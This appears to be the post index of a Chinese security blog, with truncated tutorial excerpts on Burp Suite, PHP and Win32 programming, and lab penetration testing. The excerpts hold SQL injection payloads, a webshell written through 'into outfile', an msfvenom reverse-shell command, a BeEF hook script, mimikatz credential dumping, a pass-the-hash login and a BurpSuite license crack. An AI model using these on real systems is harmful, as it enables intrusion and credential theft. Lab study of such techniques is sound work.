weixin_41489908的博客

​得不到的回应要适可而止，走不进的世界就掉头离开。。。---- 网易云热评一、Intercept，显示和修改请求信息及响应信息1、Forward，将拦截到的封包发送出去2、Drop：将拦截到的封包丢弃3、Intercept is on/off：开启/关闭抓包功能4、Action：相当于对数据包进行右击5、Open Browser：打开内置浏览器，不用配置代理，直接可以抓包二、HTTP history，显示所有请求产生的细节，包括：目标服务器和端口，HTTP ...

我总不能拿着烟和酒，去和手捧玫瑰的男孩子相比吧，对不起，我是垃圾，我的爱也是。。。---- 网易云热评之乎者也吧#BurpSuite2021#目标模块#Target视频号 一、Sitemap1、记录经过代理的所有网站信息，爬虫爬到的数据也可以在这里查看2、Contents，记录网站发出去的请求及响应信息3、Issues，网站监测到的漏洞信息二、Scope1、定义当前工作的范围内目标。这种配置会影响整个套件中工具的行为。配置作用域...

怎么说，说什么，跟谁说，放在心里吧，扛的住的就扛，扛不住往死里扛。。。​---- 网易云热评之乎者也吧#BurpSuite2021#仪表盘#Dashboard视频号 一、Tasks任务块自带两个模块，相当于以前版本的spider 和scanner 模块1、Newscan主动扫描Scandetails，设置扫描模式，爬虫或者爬虫且审计，设置扫描范围，可以把url添加到URLstoScanScanconfiguration，设置爬虫和审计的匹配规则，...

​开朗是装的，懂事是装的，跟谁都合得来都是装的，只有我自己知道，自卑是真的，难过也是真的。。。---- 网易云热评 一、抓取数据包，三种方式发送到Repeater模块，发送过去Repeater会高亮显示1、右击数据包sendtorepeater2、快捷键Ctrl+r，直接发送到Repeater模块3、点击Action，sendtorepeater二、Repeater模块介绍1、send：将数据包发送出去2、cancel：取消发送3、左右箭头：如果将数...

​又不是什么不三不四的男孩，也没有乱七八糟的关系，为什么生活还是如此糟糕。。。---- 网易云热评 从BurpSuite2020开始，好像就找不到爬虫的的选项卡了，今天尝试一下他隐藏的爬虫功能。一、从Target中找到要爬取的网站，右击网站地址，选择Engagementtools，选择Discovercontent二、配置参数1、选择扫描目录或文件，并对目录进行递归扫描2、选择扫描目录或文件字典，可以选择默认的，也可以手动添加字典文件3、设置测试的扩展名，设置...

​故事不长，始于脸红，终于眼红，爱而不得，皆是遗憾。。。---- 网易云热评一、用户设置1、选项卡字体及风格设置Useroptions--》Display2、设置数据包的字体及风格样式3、设置编码格式，当出现抓包有乱码的时候，可以来这里修改成适当的编码格式，一般默认UTF-8就可以4、界面初始化，如果界面出问题了，可以从Burp--》Useroptions--》Restoredefaults恢复默认设置二、抓包设置1、使用系统自带浏览器抓包...

​祝我什么都行，就是别祝我幸福，我要是拿走你的钱财，然后祝你发财，合适么。。。---- 网易云热评1、eval，将字符串当成PHP代码执行新建php文件，代码如下eval($_GET['a']); //相当于执行eval(phpinfo())访问：http://192.168.139.129/?a=phpinfo();2、assert，判断一个表达式是否成立新一个PHP文件，代码如下echo(assert($_GET['a']>3));传递的参数大于3返..

​给你点烟的人有很多，劝你戒烟的人却没几个。。。---- 网易云热评 一、%00绕过1、写一个get请求，可以显示提交的参数<?php$a=$_GET['id'];echo $a;?>2、查看效果192.168.139.12/?id=aiyoubucuo3、加入%00并转码，不转码没有效果，运行结果如下二、JS验证绕过1、选择文件aiyou.php，开启抓包但是没有抓到包，有弹窗，所以不是服务器验证2、将php文件改为jpg文件，...

​男孩子要娶，就要娶一见你就笑的女生，女孩子要嫁就要嫁能让你笑的男生。。。---- 网易云热评一、下载平台源码、拷贝到我们网站的根目录https://github.com/anwilx/xss_platform二、修改相关参数1、config.php，数据库用户、密码、还有xss平台的访问路径2、导入sql文件，测试的时候没法导入，所以就手动创建了数据库新建数据库打开xssplatform.sql，将里面的sql语句执行一遍3、更新站点域名，将作者的域名.

出去了，才发现自己什么都不是。。。​---- 网易云热评一、存储型XSS漏洞1、存储型xss漏洞就是将js代码存储到服务器上，然后实施攻击2、访问该漏洞地址http://192.168.139.129/pikachu/vul/xss/xss_stored.php3、可以随便留言，留一段js代码，不显示内容，js代码会直接执行，弹窗，只要该留言不删除，任何人访问到该页面都会弹窗二、反射性XSS漏洞（GET和POST）1、一次性攻击，将存在漏洞的url发送...

你上学时没读过的书、没上过的课、没跑过的步，总有一天会让你全部还回来。。。---- 网易云热评一、堆叠注入介绍1、多条sql语句同时执行2、union只能执行查询语句，堆叠可以执行增删改查3、同时执行三条语句select 1;select 2;select 3;二、插入注入1、找到注入点，添加一条数据http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,passwor..

​很多事情，原来努力了，也得不到满意的结果。。。---- 网易云热评一、宽字节注入介绍1、在注入点输入（'）会被转义为（\'）编码后为（%5c%27），只有把斜杆去掉才能注入2、GBK编码表，%DF%5C正好组成（運），所以会把\"吃掉"，0X81-0XFE都可以二、实例演示1、获取数据库名称http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,database() --+...

​时刻清零，不要老把自己的一套拿出来。。。---- 网易云热评一、常用函数1、count()；统计该列有几条数据2、rand()：产生0-1随机数3、group by：根据某一列排序，改列必须出现在前面查询的内容4、floor(1.23)：获取小于等于该值的最大整数5、as：给查询的列名内容重命名6、concat(1,2,3)：将里面的内容连接在一起二、实例演示1、获取当前数据库名称http://192.168.139.129/sqli/Less-.

生活不止眼前的苟且，还有房费、饭费、水电费。。。----网易云热评一、常用函数1、sleep(5)：延时5秒2、if(a,b,c)：a为条件，正确返回b，否则返回c二、实例测试1、找到可以注入的payload，服务器反映5秒才有相应http://192.168.139.129/sqli/Less-9/?id=1' and sleep(5) --+2、获取数据库长度，如果数据库名的长度等于8停留5秒http://192.168.139.129/sqli/..

千万不要在你还没辞职的时候，告诉你同事说要辞职了。。。---- 网易云热评 一、常用函数1、mid(str,1,5)：取字符串str的前5个字节2、ord()：转换成ASCII码3、length()：统计长度4、 ascii()：将字符转换ASCII二、实例演示1、and 1=1访问http://192.168.139.129/sqli/Less-8/?id=1'and1=1--+返回正确2、and 1=2访问http://192.168...

得到一个像原来老师一样督促你、关心你的人很难。。。​---- 网易云热评一、常用命令及函数1、orderby排序，获取数据有几个字段，后面小于等于字段数，都会返回结果，大于字段数返回错误select * from users order by 3；2、unionselect联合查询，后边必须跟一样的字段数select * from users union select 1,2,5;3、user()查看当前mysql用户4、version()查看mysql版...

社会运行的规则和自己的不一样，不能我行我素，甚至有时还得违心讨好。。。---- 网易云热评 一、数据库导出文件1、连接数据库2、通过intooutfile导出数据库内容select * from users into outfile "c:/1.sql";3、通过intooutfile语句，在C盘目录写入一句话木马select '<?php phpinfo();?>' into outfile "c:/aiyou.php";4、通过实例导出一...

​钱真的很重要，以前总觉得太看重钱的人现实，但没钱，真的寸步难行。。。---- 网易云热评一、整数注入1、访问http://192.168.139.129/sqli/Less-2/?id=1and 1=1，返回正常2、访问http://192.168.139.129/sqli/Less-2/?id=2-1，返回正常3、访问http://192.168.139.129/sqli/Less-2/?id=1and 1=2，返回不正常说明该注入点是整数注入二、字符串注...

有啥别有病，没啥别没钱，毕业这些年，我却掏不出给自己治病的钱。。。​---- 网易云热评1、连接数据库$lj=mysql_connect("127.0.0.1",'root','root');2、判断是否连接成功,连接失败返回falsevar_dump($lj);3、数据库操作，增添改查<?php$lj=mysql_connect("127.0.0.1",'root','root');//连接数据库var_dump($lj);echo "<br/>..

​你可以选择如何对别人，但绝对不能奢望别人也会那么对你。。。---- 网易云热评一、读文件1、open()函数，第一个参数是要操作文件的名字，第二个是操作文件的方式2、操作文件模式r：只读，文件指针在开头w：只写，删除文件内容，如果该文件不存在则创建一个新文件a：只写，文件保存现有数据，指针在结尾，如果该文件不存在则创建一个新文件r+：读写，文件指针在开头w+：读写，删除文件内容，如果该文件不存在则创建一个新文件a+：读写，文件保存现有数据，指针在结尾，如果该..

​成年人只管利益，小孩子才分对错。。。---- 网易云热评一、GET请求1、get可以理解为一个系统定义好的数组2、通过var_dump看一下GET的类型，浏览器访问网址，后面加上"?aiyou=bucuo"，相当与数组名为GET，键是aiyou，值是bucuo3、一般get请求都是访问某个文件4、通过GET写文件<?php$a=$_GET['aiyou'];//取键为aiyou的值$b=fopen("aiyou.txt", "w+");//打开文件fw...

​别害怕，你迷茫的路，别人也迷茫过，走过去就好了。。。---- 网易云热评 一、把多个数据放到一个变量里面的集合叫做数组二、数组分类1、索引数组，以下标取值<?php$a = array('1',2,3,'324');echo "$a[2]";echo "<br/>";echo "$a[3]";echo "<br/>";var_dump($a[2]);echo "<br/>";var_dump($a[3]);?>运行结果：3324...

​珍惜身体，多锻炼，早睡早起，不停学习，不停旅行，即使腿脚未在路上，也要让心在路上。。。---- 网易云热评 一、函数1、一个函数可以理解为就是一个功能2、以字母或者下划线开头3、函数名大小写不敏感4、普通函数<?phpfunction aiyou(){ echo "123"; echo "<br/>"; echo "456"; echo "<br/>"; echo "789"; echo "<br/&..

​很多时候都是逼着自己往前走，不是前面的的风景有多迷人，而是生活的现实太残酷。。。---- 网易云热评一、数据类型1、字符串<?phpheader("Content-Type:text/html;charset=utf-8");$a="web安全工具库";//一般字符串用双引号表示$b="$a";//双引号会做解析$c='$a';//单引号不做解析$d=strlen($a);//strlen获取字符串长度echo $b;echo "<br/>";echo $c;e..

​关于抑郁症，最戳心的自述：没有人觉得我病了，他们只是觉得我想多了。。。---- 网易云热评一、环境搭建1、利用Phpstudy搭建网站环境官网地址：https://www.xp.cn/download.html/2、SublimeText3编辑软件官网地址：https://www.sublimetext.com/3二、环境测试1、php文件格式<?phpphpinfo();//代码段?>2、将该文件保存到PHPstudy网站的根...

​你明白的，其实你明白的，你只是还没有放过自己。。。---- 网易云热评 环境介绍：1、攻击机kali：192.168.139.1332、目标主机win7：192.168.139.129一、启动ettercap1、ettercap -G2、设置网卡二、获取主机信息1、点击放大镜，搜索本地主机，2、点击列表信息，选择我们要攻击的目标ip3、右击网卡及目标主机ip添加到target1和target24、点击圆球标志，再选择A...

​其实挺期待的，什么人会爱上真实的我，你会么。。。---- 网易云热评一、插上网卡，选择虚拟机设备，设备连接不到虚拟机，点击编辑，选择首选项二、查看是否连接到无线网卡，邮寄虚拟机的名字，选择可移动设备，无线网卡这有个对勾三、点击这里也会识别到周边的网络四、查看网卡设备1、ifconfig2、查看是否支持监听模式airmon-ng3、开启监听模式airmon-ng start wlan04、查看周围WiFi网络...

如果我们，不会和好了，希望你不要当成故事，讲给别人听。。。​---- 网易云热评一、安装谷歌浏览器1、下载安装包wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb2、安装gdbitgdebi google-chrome-stable_current_amd64.deb，提示安装gdbit，按y，继续安装3、进入root模式，安装gdebi google-..

​知道为什么梦里的人都看不清脸么？因为怕你当真。。。---- 网易云热评 一、通过MSF生成shellcode1、启动MSF，演示版本是6.0.362、通过msfvenom生成相关代码msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' lhost=192.168.139.133 lport=8585 -f c-p：指定payload-e：指定选择使用的编码...

我以为我不理你，你会难过，可结果呢，难过的是我。。。---- 网易云热评简介：通过搜索关键词找到需要的漏洞，可以理解为一个离线的漏洞库一、命令searchsploit1、-c --case搜索时区分大小写，默认不区分大小写2、-e --exact 精确搜索，比如：搜索“ WordPress 4.1”时，结果绝对不会出现 “WordPress Core 4.1”3、-s --strict 精确搜索，输入值必须存在4、-t --tittle搜索exploit标题5、-...

我反感任何人以一种开玩笑的语气说着我最在意的事。。。---- 网易云热评一、wmap模块0、启动并连接数据库service postgresql start1、加载插件load wmap2、添加站点wmap_sites -a http://192.168.139.1323、列出站点可用的目标wmap_sites -l4、添加目标wmap_targets -t http://192.168.139.1325、测试目标wmap...

​人这辈子总是再等，等以后，等下次，等不忙，等有条件，等有时间，等有钱了，可是，后来呢。。。---- 网易云热评简介：一款运行在linux系统上的webshell管理工具，可以实现Shell访问目标，以目标为中心的SQL控制台，HTTP / HTTPS代理浏览目标，上传和下载文件，生成反向和直接TCP Shell，审核远程目标安全，端口扫描以目标为中心，挂载远程文件系统，以目标为中心的Bruteforce SQL帐户。一、下载地址（软件作者）https://github.com/ep..

​我没有被谁好好爱过，所以只要有人对我好一点，我就以为遇到对的人，如果打扰到你，不好意思。。。---- 网易云热评一、设置BurpSuite，保存日志文件1、选择Projectoptions====》Misc====Logging，点击Request2、设置日志文件的名字及保存的位置二、抓包不用开启，打开自带浏览器，随便访问一些网站三、查看生成文件的内容，就是我们访问过的数据包四、用sqlmap扫描上面数据包信息sqlmap -l burp....

​当我不欠任何人的时候，我就只欠我自己了。。。----网易云热评一、安装beef-xss输入beef-xss，提示安装，输入y二、启动beef-xss三、访问登陆页面：http://192.168.139.133:3000/ui/panel四、让目标主机访问存在生成的钩子代码http://192.168.139.129:81/dvwa/vulnerabilities/xss_r/?name=<script src="http://192.168.139.1.

​我从来没有后悔遇见你，只是觉得有点遗憾，爱了你那么久，最后连个像样的交代都没有，没有不甘心，只是心很疼。。。----网易云热评 一、启动BurpSuite，选择Extender--》BAppStore--》XSSValidator，点击Install二、安装phantomjs它是一个基于webkit的JavaScript API。它使用QtWebKit作为它核心浏览器的功能，使用webkit来编译解释执行JavaScript代码。任何你可以在基于webkit浏览器做的事情，它都...

再等几年我们就在一起上下班，逛超市，做饭，窝在沙发上看电影，在我们自己家里，等我再努力一下。。。---- 网易云热评一、启动BurpSuite，选择Extender--》BAppStore--》SQLiPysqlmapintegration二、安装Jython1、点击Downloadjython，选择JythonInstaller，下载2、安装java -jar jython-installer-2.7.2\ .jar一路下一步3、配置J...

你的心态就是你最好的风水，你的人品就是你最好的运气，生活简单点，心地善良点，工作努力点，幸福自然多一点。。。---- 网易云热评简介：AWVS是自动化应用程序安全测试工具，主要用于扫描web应用程序上的安全问题，如SQL注入，XSS，目录遍历，命令注入等一、下载AWVS相关包，请支持正版二、给脚本文件最高权限chmod 777 acunetix_13.0.200807155_x64.sh三、安装步骤sudo -i 切换root模式./acuneti...

我心里一直是有个坎儿过不去，我总感觉我和她还没有结束，但我比谁都清楚，我跟这个人没有以后了。。。---- 网易云热评简介：DirBuster支持全部的Web目录扫描方式。它既支持网页爬虫方式扫描，也支持基于字典暴力扫描，还支持纯暴力扫描。该工具使用Java语言编写，提供命令行（Headless）和图形界面（GUI）两种模式。其中，图形界面模式功能更为强大。用户不仅可以指定纯暴力扫描的字符规则，还可以设置以URL模糊方式构建网页路径。同时，用户还对网页解析方式进行各种定制，提高网址解析效率。一、.

你喜欢上别人挺好的啊，不然我总觉得我们还有可能。。。---- 网易云热评介绍：一款扫描CMS相关信息的软件，该软件可进行170多个CMS的基本检测，可检测Drupal版本信息，可扫描多个站点下载地址（软件作者）：https://github.com/Tuhinshubhra/CMSeeK一、安装启动CMSeek1、在Kali中直接输入cmseek，启动该软件2、如果提示没有安装，选择y，进行安装二、选择1，进行cms基本检测，结果会自动保存三、选择2，多个域名扫.

​走不进的世界就不要硬挤了，难为了别人，何必呢。。。---- 网易云热评一、软件介绍nikto，基于perl语言开发的web页面扫描器。其特点扫描全面，速度快二、使用方法1、扫描单个url：nikto -hosthttp://192.168.1.1082、扫描多个url：多个url卸载1.txtnikto -host 1.txt3、扫描https网站nikto -host www.baidu.com -ssl -port 443...

​你所得到的惊艳，都曾被平庸历练，你必须跌到你从未经历的谷底，才能战胜你从未达到的高峰。。。---- 网易云热评一、在线查找1、通过google语法site:baidu.com2、通过在线网站https://phpinfo.me/domain3、通过证书搜索https://crt.sh/4、通过dns搜索http://dns.bufferover.run/dns?q=baidu.com二、sublist3r工具搜索1、下载安装：..

我的骄傲不允许我把这崩溃的日子告诉别人，只有我知道，只是一夜间，我的心就变得判若两人。。。---- 网易云热评​一、默认扫描nmap目标IPnmap 192.168.139.1321、如果是root用户，默认的是SYN扫描2、如果是普通用户，默认的是TCP连接扫描，不安全，慢二、指定端口扫描nmap -p 端口(范围)目标IPnmap -p 20-25 192.168.139.132三、穿透防火墙扫描，服务器禁止ping命令，可以试试-P...

什么都是假的，钱难挣是真的，在这个工资赶不上物价的时代，我们只能努力奔跑，不然一不小心，连快乐都养不起。。。---- 网易云热评一、文件查看操作命令1、cat 1.txt查看较少的内容2、more 1.txt通过回车键查看较多的内容3、head 1.txt查看文件的前N行，默认是前10行4、wc 1.txt查看文件的行数、字数、字节数、格式5、sata 1.txt查看文件存储及时间等相关信息6、touch 1.txt更新文档时间为当前时间，不存在则创.

​无人问津也好，技不如人也罢，你要试着安静下来，着手去做自己该做的事，而不是让烦躁焦虑毁掉你本就不多的热情和定力。。。---- 网易云热评一、VIM编辑器1、打开1.txt文件vim 1.txt，默认是命令模式，可以通过ctrl+shift+V快捷键粘贴内容2、模式切换esc：切换命令模式i：切换输入模式l：在光标所在行首转换为输入模式a：在当前光标所在字符的后面,转为输入模A：在光标所在行的行尾,转换为输入模式o：在当前光标所在行的下方,新建一行,并转为..

我不在意你是否为我而来，我只知道那天走廊里的风及树叶间隙折射的光，格外温柔耀眼。。。---- 网易云热评一、下载地址1、https://www.kali.org/downloads/二、安装过程1、新建一个典型虚拟机，并选择稍后安装系统2、选择客户机操作系统、并选择安装路径，设定磁盘大小3、自定义硬件，声卡、usb、打印机直接移除，处理器根据自己的cpu设置，指定使用的ISO文件，点击关闭，完成4、点击开启此虚拟机5、选择gr...

​面对困境，我们也各有各的选择，放下得失，体会豁达是选择，苦心经营，学着隐忍是选择，当然你也可以带上拳套，奋力搏击。。。。---- 网易云热评一、技术架构1、C/S模式客户端与服务器进行交互，比如qq、播放器2、B/S模式浏览器与服务器进行交互，比如各种浏览器二、HTTP协议1、概念HTTP协议(HyperTextTransfer protocol),超文本传输协议)是用于从WWW服务器传输超文本到本地浏览器的传输协议。它可以使浏览器更加高效,使网络传输减...

年轻的时候爱上什么都不为过，成熟了以后放弃什么都理解，我们终其一生，不过是想找一个能一起吃饭的人。。。---- 网易云热评​一、产生原因代码与数据不区分。程序把用户输入的恶意内容传入SQL语句中执行,导致SQL注入漏洞产生。二、常见挖掘方式直接对url中的参数（请求参数、请求头）进行注入Burp抓取post包进行注入三、判断注入点单引号判断：如果出现错误回显，则该页面就可能存在sql注入http://www.webanquangongjuku.c...

年轻的时候爱上什么都不为过，成熟了以后放弃什么都理解，我们终其一生，不过是想找一个能一起吃饭的人。。。---- 网易云热评一、Windows进程介绍一个容器，包含程序执行需要的代码、数据、资源等等信息。Windows是多任务操作系统，可以同时执行多个进程。​二、Windows进程的特点：1、每个进程都有自己的ID号 2、每个进程都有自己的地址空间，进程之间无法访问对方的地址空间。3、每个进程都有自己的安全属性 4、每个进程当中至少包含...

​终于明白了，超市那么多饮料，还是会有人买矿泉水，就像现在外面有很多诱惑，但最终还是会选择干净有趣的灵魂吧。。。---- 网易云热评小攻：IP地址：192.168.139.129 Win7小受：IP地址：192.168.139.128，Ubuntu一、拿到webshell后，点击反弹提权二、小攻运行nv -vv -l -p 3355三、在反弹提权页面，输入小攻的地址及上面监听的端口号，点击开始连接四、小攻已成功连接小受，输入命令函数w...

​可能是这个时代太坏了，感情泛滥，语言没有重量，随便说出口的喜欢与爱，配不上一颗赤诚的真心。。。---- 网易云热评小攻：IP地址：192.168.1.103 win7小受：IP地址：双网卡192.168.1.105/192.168.4.11 win2003当拿到一台内网主机的时候，如何将攻击机加入到对方内网网络，可以通过reGeorg实现一、下载地址（软件作者）https://github.com/sensepost/reGeorg二、通过webshell将...

​成熟是你越来越能接受现实，而不是变得越来越现实，不是你能用大道理去开导别人，而不是你能说服自己去理解身边的人和事。。。---- 网易云热评一、新建dll项目二、新建.h文件#ifndef __CLASSDLL_H#define __CLASSDLL_H#ifdef DLLCLASS_EXPORTS#define EXT_CLASS _declspec(dllexport)#else#define EXT_CLASS _declspec(dllimport)#endifc...

世间最好的默契，并非是有人懂你说出的故事，而是有人懂你说不出的心事。。。​---- 网易云热评一、查询远程连接的端口1、命令查询，win7/win10/win2003都可以使用REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber0xd3d转换十进制是33892、注册表查询二、开启3389端口的方法1、工具开启..

大部分男人收到的第一束花，都是在自己的墓碑前。。。​---- 网易云热评一、WSockExpert，一款对进程抓包的软件关注视频号：之乎者也吧，私信获取下载地址二、打开菜刀，并在WSExplore中找到菜刀进程，右击，打开进程三、在菜刀中添加一句话木马地址及密码，并连接四、查看WSExplore，会发现两条可疑的数据包，地址和其他的不一样，提交信息中也有一句话木马地址和密码禁止非法，后果自负欢迎关注公众号：web安全工具...

别再让我遇到，不会有结果又很喜欢的人。。。​---- 网易云热评一、访问上传的木马文件http://192.168.1.104/1.asp二、点击F12，打开谷歌自带的开发人员工具，点击network三、输入密码，看看抓包情况，该木马会自动向某网站上传木马路径和密码四、查看木马源文件，然后搜索该网址，随便修改为一个无效地址，该木马用的是反转加密，所以我们搜索不到，有时候是其他加密，需要解密才可以修改注意：抓包的时候，有的后门不是一登录就发送的...

​别再让我遇到，不会有结果又很喜欢的人。。。---- 网易云热评一、静态库程序运行时不存在，会被链接到可执行文件或者动态库中，目标程序的归档。文件扩展名：LIB二、静态库的使用（C语言）1、新建空项目2、新建.c文件3、相关代码int 加法(int a, int b){ return a + b;}int 减法(int a, int b){ return a - b;}4、设置常规属性5、右键项目，直接生成.lib文件...

​你可以爱一个人卑微到尘埃里，但没人会喜欢尘埃里的你。。。---- 网易云热评一、新建项目，导入创建好的空窗口程序二、添加菜单资源在注册窗口挂起菜单wc.lpszMenuName = (wchar_t*)IDR_MENU1;三、添加对话框资源四、创建对话框窗口处理函数INT CALLBACK 对话框处理(HWND hWnd, UINT msgID,WPARAM wParam, LPARAM lParam){ //将消息交给系统的对话框...

​你可以爱一个人卑微到尘埃里，但没人会喜欢尘埃里的你。。。---- 网易云热评声明：该软件来源网络，仅供学习交流一、下载地址：1、公众号回复202103102、关注视频号：之乎者也吧，私信我二、解压后，双击打开BurpSuite点击三、打开BurpSuiteLoader，将license信息复制到过去，点击next四、选择manualactivation五、copyrequest到activationre...

我能想通，也能接受，但是，我很难过。。。​---- 网易云热评一、利用QuarksPwDump获取hash值quarkspwdump --dump-hash-local --output 1.txt二、利用msf远程登录1、选择攻击模块use exploit/windows/smb/psexec2、设置相关参数set rhosts 192.168.139.129set smbuser administratorset smbpass AAD3B43...

​错，可以改，那，错过呢。。。---- 网易云热评一、新建项目，导入创建好的空窗口程序二、添加菜单资源在注册窗口挂起菜单wc.lpszMenuName = (wchar_t*)IDR_MENU1;三、添加对话框资源四、创建对话框窗口处理函数INT CALLBACK 对话框处理(HWND hWnd, UINT msgID,WPARAM wParam, LPARAM lParam){ //将消息交给系统的对话框窗口处理函数，true，完全自己处理 .

​错，可以改，那，错过呢。。。---- 网易云热评一、首先用QuarksPwDump导出hash值并存储到1.txtquarkspwdump --dump-hash-local --output 1.txt二、下载并安装LC5并注册1、下载地址：回复2、双击lc5setup一路下一步，3、将hashgen和lc5替换了原文件4、双击lc5，并打开注册机，点击administrator三、使用方法1、点击会话，导入1.txt...

我怎么可能失望呢，我对这个世界早就不抱任何希望了。。。​---- 网易云热评一、添加一张位图二、相关代码#include <windows.h>#include "resource.h"HINSTANCE g_hInstance = 0;//接收当前程序实例句柄HANDLE g_输出句柄 = 0;//接收标准输出句柄int g_x = 128;int g_y = 128;void 绘图(HWND hWnd){ PAINTSTRUCT p = {...

我怎么可能失望呢，我对这个世界早就不抱任何希望了。。。​---- 网易云热评一、软件介绍一款获取windows账号密码的软件二、下载地址（软件作者）https://github.com/gentilkiwi/mimikatz三、使用方法1、解压后双击打开，分32位和64位2、输入下面两行命令，直接获取密码privilege::debugsekurlsa::logonpasswords禁止非法，后果自负欢迎关注公众号：web...

男孩子都是铁的，你不用考虑他们的感受，他们真的不累，真的，真的不累。。。---- 网易云热评作用：生成木马文件1、msfvenom相关参数介绍-p, --payload <payload> 指定需要使用的payload(攻击荷载)-l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all-n, --nopsled <length> 为payload预先指定一个N.

男孩子都是铁的，你不用考虑他们的感受，他们真的不累，真的，真的不累。。。---- 网易云热评一、接受绘图消息case WM_PAINT: 绘图(hWnd); break;二、实现绘图方法void 绘图(HWND hWnd){ PAINTSTRUCT p = {};//创建画笔 HDC hdc = BeginPaint(hWnd, &p);//画笔句柄 画个点(hdc); En.

现在努力，去见未来相见的人。。。---- 网易云热评一、画笔步骤及相关代码void 绘图(HWND hWnd){ PAINTSTRUCT p = {}; HDC hdc = BeginPaint(hWnd, &p); //1、创建笔 HPEN hPen = CreatePen(PS_SOLID, 10, RGB(255, 0, 0)); //2、将画笔应用到DC中 HGDIOBJ jdcp = Select..

​给时间一点时间，让过去过去，让开始开始。。。---- 网易云热评作用：获取目标主机后shell后，继续信息收集，提权1、获取目标分区情况run post/windows/gather/forensics/enum_drives2、检测是否是虚拟主机run post/windows/gather/checkvm3、获取当前安装的应用程序runpost/windows/gather/enum_applications4、获取用户登录信息run post/..

给时间一点时间，让过去过去，让开始开始。。。---- 网易云热评一、图标资源 1、注意图标的大小，一个图标文件中，可以有多个不同大小的图标。2 加载HICON LoadIcon( HINSTANCE hInstance, // handle to application instance LPCTSTR lpIconName // name string or resource identifier); 成功返回HICON句柄3、从...

就趁着春天吧，一点一点重新来过。。。---- 网易云热评往期回顾Metasploit -- 攻击载荷模块(Payloads)文字版Metasploit -- 渗透攻击模块(exploit)文字版Metasploit -- 扫描并分析主机(文字版)Metasploit -- 工作区操作(文字版)Metasploit -- 更新后报错处理(文字版)作用：Metasploit的辅助模块主要用于信息搜集阶段，功能包括扫描、口令猜解、敏感信息嗅探、FUZZ测试发掘漏洞、...

就趁着春天吧，一点一点重新来过。。。---- 网易云热评一、字符串资源1、新建StringTable2、修改相应的字符串，主要用来切换中英文3、替换文中的字符串wchar_t s[256] = { 0 }; LoadString(g_hInstance, IDS_MAIN, s, 256); HWND hWnd = CreateMain(L"主", s);4、效果对比二、快捷键资源1.新建快捷键资源将“不”的命令绑定快..

电影太仁慈了，总是让错过的人重新相遇，可是现实就不一样了，说了再见，就真的再也不见了。。。---- 网易云热评​攻击载荷是指用户希望对目标系统攻击成功之后去执行的代码。例如，创建一个Meterpreter连接或者通过绑定到一个监听端口，来获取Shell交互。也可以利用攻击载荷在目标操作系统上执行一些命令，如添加账号等。一、Payloads分类1、singles（独立载荷）直接植入目标系统并执行相应的程序，如：shell_bind_tcp2、stager...

终于熬成了不想和任何人说话，包括家里的人都不想联系，厌倦了这个世界的是是非非，就算你说晚上有太阳我都不想辩解了。。。​---- 网易云热评作用：渗透攻击模块可以直接发起渗透攻击1、显示所有渗透攻击模块showexploits根据需求筛选模块search -h2、查找关于mysql数据库的攻击模块search name:mysql type:exploit3、查找路径含有mysql的模块searchpath:mysql4、查找漏洞编号sea...

她开玩笑地说了句：挺可惜的，我的青春平平淡淡，站在她身旁的男生红着眼眶：你惊艳了我至少三年。。。​---- 网易云热评一、使用db_namp命令扫描存活主机db_nmap -sU 192.168.139.0/24注意：也可以直接使用nmap -sU 192.168.139.0/24，但是这样是直接使用的nmap扫描，而不是通过metasploit调用namp，所以不会记录结果二、文件导入（支持多种扫描报告，re.xml是nmap的一个扫描报告）workspace...

她开玩笑地说了句：挺可惜的，我的青春平平淡淡，站在她身旁的男生红着眼眶：你惊艳了我至少三年。。。----网易云热评一、修改系统菜单项1、在create消息中处理 case WM_CREATE: 获取系统菜单(hWnd); break;2、系统菜单的修改AppendMenu添加DeleteMenu删除void 获取系统菜单(HWND hWnd){ //获取系统菜单句柄，false表示现在的句柄 HM

现在终于明白了，老师说的那句话，你现在想逃离的地方，也是你以后拼了命也想要回去的地方。。。---- 网易云热评一、启动metasploit1、搜索msf，直接启动2、通过命令启动msfconsole3、查看数据库是否连接，扫描出来的数据都会存储到数据库db_status二、创建工作区，不同站点使用不同的工作区，避免数据混淆1、查看当前工作区,带星号的表示当前工作区workspace2、新建工作区workspace -aaiyou3、切...

相亲的男生普遍自卑，而女生却比较挑剔，因为大部分男生已经意识到自己的普遍，而女生往往却还活在梦里。。。---- 网易云热评1、更新源apt-get update2、更新metasploitapt-get install metasploit-framework3、更新后，启动时报错处理4、根据提示，更新gemgem update --system5、进入metasploit目录（cd /usr/share/metasploit-framework/）...

相亲的男生普遍自卑，而女生却比较挑剔，因为大部分男生已经意识到自己的普遍，而女生往往却还活在梦里。。。---- 网易云热评一、资源介绍accelerator：快捷键bitmap：位图cursor：光标dialog：对话框html：网页icon：图标Menu：菜单Ribbon：功能区string table：字符串表toolbar：工具栏version：版本二、通过资源添加菜单项1、新建空项目2、添加源文件(空窗口代码)3、右击资..

好像什么都来得及，又好像什么都无能为力，蹲下来摸摸自己的影子，说声对不起，跟着我受委屈了。。。---- 网易云热评1、添加数据insert into 专辑 (序号,专辑名称,主打歌,发行时间) values(1,'周杰伦的床边故事','告白气球','2016-6-24');insert into 专辑 (专辑名称,主打歌,发行时间) values('哎呦，不错哦','鞋子特大号',' 2014-12-26');insert into 专辑 (序号,专辑名称,主打歌,发行时间) values(.

不知道少了什么，总觉得没有以前快乐，不后悔遇见谁，只后悔变成现在的模样。。。---- 网易云热评一、环境安装PHPstudy下载地址，一路下一步，安装的时候路径不要有中文或者空格https://www.xp.cn/download.html二、操作mysql数据库1、通过命令启动，进入mysql安装目录，C:\phpstudy_pro\Extensions\MySQL5.7.26\bin，按着shift，右击鼠标，打开DOS窗口连接数据库：mysql -uroot -pro.

不知道少了什么，总觉得没有以前快乐，不后悔遇见谁，只后悔变成现在的模样。。。---- 网易云热评一、窗口的顶层菜单1、创建菜单HMENU CreateMenu(VOID); //创建成功返回菜单句柄2、增加菜单项BOOL AppendMenu(HMENU hMenu, //菜单句柄UINT uFlags, //菜单项风格UINT_PTR uIDNewItem, //菜单项ID或下拉菜单的句柄LPCTSTR lpNewItem...

